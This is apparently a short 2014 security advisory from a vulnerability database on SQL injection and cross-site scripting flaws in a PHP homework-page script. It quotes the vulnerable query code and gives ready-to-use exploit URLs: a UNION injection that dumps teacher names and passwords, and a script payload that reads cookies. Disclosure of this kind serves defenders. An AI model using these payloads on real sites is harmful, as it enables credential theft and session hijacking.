Middle School Homework Page V1.3 Beta 1 Multiple Vulnerabilties

2014.01.08
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89
CWE-79

Middle School Homework Page V1.3 Beta 1 - Multiple Vulnerabilties =================================================================== #################################################################### .:. Author : AtT4CKxT3rR0r1ST .:. Contact : [F.Hack@w.cn] , [AtT4CKxT3rR0r1ST@gmail.com] .:. Home : http://www.iphobos.com/blog/ .:. Script : http://sourceforge.net/projects/mshwpage/ #################################################################### I. Sql Injection ############## VULNERABILITY ############## /view.php (line 3-4) ----------------------------------------------------------------------------- <h2>Homework for <?php get_array("select * from class where classID=$_REQUEST[class]", 'classDesc') ?> as of <?php $today = date("M j G:i:s T Y");echo $today; ?>:</h2> <?php ----------------------------------------------------------------------------- ######### EXPLOIT ######### ( localhost/mshwpage/view.php?class=null+and+1=2+union+select+1,concat(name,0x3a,pass)+from+teachinfo II. Cross Site Scripting localhost/mshwpage/view.php?class=<script>alert(document.cookie);</script> ####################################################################


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top